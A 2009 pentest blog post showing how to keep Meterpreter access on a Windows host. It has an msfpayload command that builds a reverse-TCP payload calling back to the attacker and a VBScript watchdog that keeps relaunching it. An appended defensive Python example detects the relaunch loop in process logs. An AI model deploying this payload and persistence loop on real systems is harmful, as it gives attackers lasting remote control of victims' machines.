2009.06.02

A pentester does not usually need persistent access to a target. However, cases do arise where it becomes necessary: the target service could be unreliable or only running at certain times, or a particular host may be the only entry point into the target environment. Installing a reliable backdoor can come in handy under those circumstances.

Netcat has a hard listener switch "-L" which makes it a nice backdoor tool, but unmodified netcat.exe binaries are easily detected by antivirus. One of my favorite backdoors is the meterpreter.dll, which can be packaged into an executable for reverse access back to the attacker's workstation:
./msfpayload windows/meterpreter/reverse_tcp LHOST=attack.er.ip.addy LPORT=4444 X > meterpreter.exe
The Problem:

Whenever the attacker quits the meterpreter session, or the session crashes because of something like a process migration, the meterpreter.exe process on the target machine stops. It is always possible to create a scheduled task or a registry key to restart meterpreter.exe on boot, but sometimes that is not desirable: you have to wait for the target machine to reboot, and such registry keys and scheduled tasks can be messy to clean up.

The Solution:

Here is a simple .vbs script that launches an executable and then waits a specified amount of time before checking whether the executable is still running. If it has been terminated for any reason, the script relaunches it. The script runs indefinitely. NOTE: to stop the script, you must kill the wscript.exe process.

The following example waits 5 seconds before checking the processes and relaunching if needed.

Copy and paste the following code into a text file called persist.vbs:

' persist.vbs: relaunch meterpreter.exe whenever it is no longer running
state = 1
While state = 1
    Set WshShell = WScript.CreateObject("WScript.Shell")
    ' Enumerate the running processes through WMI
    Set colProcessList = GetObject("Winmgmts:").ExecQuery("Select * from Win32_Process")
    For Each objProcess in colProcessList
        If objProcess.name = "meterpreter.exe" Then
            vFound = True
        End If
    Next
    If vFound = True Then
        ' Still running: check again in 5 seconds (5000 ms)
        WScript.Sleep 5000
    Else
        ' Not running: relaunch it, then wait before the next check
        WshShell.Run ("C:\PATH\TO\YOUR\EXE\meterpreter.exe")
        WScript.Sleep 5000
    End If
    vFound = False
Wend

You can run your newly created script by typing the following at the command prompt:
cscript persist.vbs

When it is launched this way the script host is cscript.exe rather than wscript.exe, so that is the process to kill to stop the loop.
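How a defender would spot this loop in process-creation telemetry, as an added example that is not part of the original post: the Python below parses a constructed, Sysmon-style process-creation log (the field layout, file paths, PIDs and timestamps are all made up for the example) and flags any wscript.exe or cscript.exe parent that spawns the same executable more than once, which is the trace persist.vbs leaves each time the watched process dies and is relaunched.

```python
"""Detect the relaunch loop that persist.vbs produces, from process-creation logs.

Added example (not from the original post). Input is a constructed,
Sysmon-style process-creation log: one record per line with the fields
UtcTime|ProcessId|Image|ParentProcessId|ParentImage.
"""
import ntpath
from collections import defaultdict
from datetime import datetime

# Windows Script Host interpreters: a .vbs watchdog runs inside one of these.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Constructed sample log (paths, PIDs and times are invented for the example).
# PID 1001 is cscript.exe running persist.vbs; it relaunches meterpreter.exe
# every time that process exits. PID 1006 is an ordinary one-off script run.
SAMPLE_LOG = """\
2009-06-02 10:00:00|1001|C:\\Windows\\System32\\cscript.exe|900|C:\\Windows\\System32\\cmd.exe
2009-06-02 10:00:05|1002|C:\\Users\\bob\\meterpreter.exe|1001|C:\\Windows\\System32\\cscript.exe
2009-06-02 10:03:10|1003|C:\\Users\\bob\\meterpreter.exe|1001|C:\\Windows\\System32\\cscript.exe
2009-06-02 10:07:45|1004|C:\\Users\\bob\\meterpreter.exe|1001|C:\\Windows\\System32\\cscript.exe
2009-06-02 10:08:00|1005|C:\\Windows\\System32\\notepad.exe|900|C:\\Windows\\System32\\cmd.exe
2009-06-02 10:09:00|1006|C:\\Windows\\System32\\cscript.exe|950|C:\\Windows\\explorer.exe
2009-06-02 10:09:01|1007|C:\\Windows\\System32\\net.exe|1006|C:\\Windows\\System32\\cscript.exe
"""


def parse_log(text):
    """Parse pipe-separated process-creation records into dicts.

    Image names are reduced to lower-case basenames so that comparisons do
    not depend on the install path or on the case the logger reported.
    """
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        when, pid, image, ppid, parent_image = line.split("|")
        records.append({
            "time": datetime.strptime(when, "%Y-%m-%d %H:%M:%S"),
            "pid": int(pid),
            "image": ntpath.basename(image).lower(),
            "ppid": int(ppid),
            "parent_image": ntpath.basename(parent_image).lower(),
        })
    return records


def find_relaunch_loops(records, min_launches=2):
    """Return one finding per script-host parent that launched the same child
    executable at least ``min_launches`` times.

    A single launch is normal (logon scripts, installers); the same child
    re-created again and again by one long-lived wscript/cscript process is
    the watchdog signature.
    """
    launches = defaultdict(list)
    for r in records:
        if r["parent_image"] in SCRIPT_HOSTS:
            launches[(r["ppid"], r["parent_image"], r["image"])].append(r["time"])

    findings = []
    for (ppid, parent, child), times in launches.items():
        if len(times) < min_launches:
            continue
        times.sort()
        findings.append({
            "parent_pid": ppid,  # the process to terminate to stop the loop
            "parent": parent,
            "child": child,
            "launches": len(times),
            "span_seconds": int((times[-1] - times[0]).total_seconds()),
        })
    return findings


if __name__ == "__main__":
    for f in find_relaunch_loops(parse_log(SAMPLE_LOG)):
        print(f"{f['parent']} (PID {f['parent_pid']}) relaunched {f['child']} "
              f"{f['launches']} times over {f['span_seconds']} s")
```

Because the loop respawns the child within seconds of it exiting, killing meterpreter.exe alone only produces another launch record; the response is to terminate the script-host parent (the wscript.exe or cscript.exe PID reported in the finding), which is what the note above about stopping the script amounts to. The detector keys on any child executable rather than on the name meterpreter.exe, since the binary can be called anything; on hosts where logon scripts legitimately run under cscript.exe, raise min_launches to cut noise.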
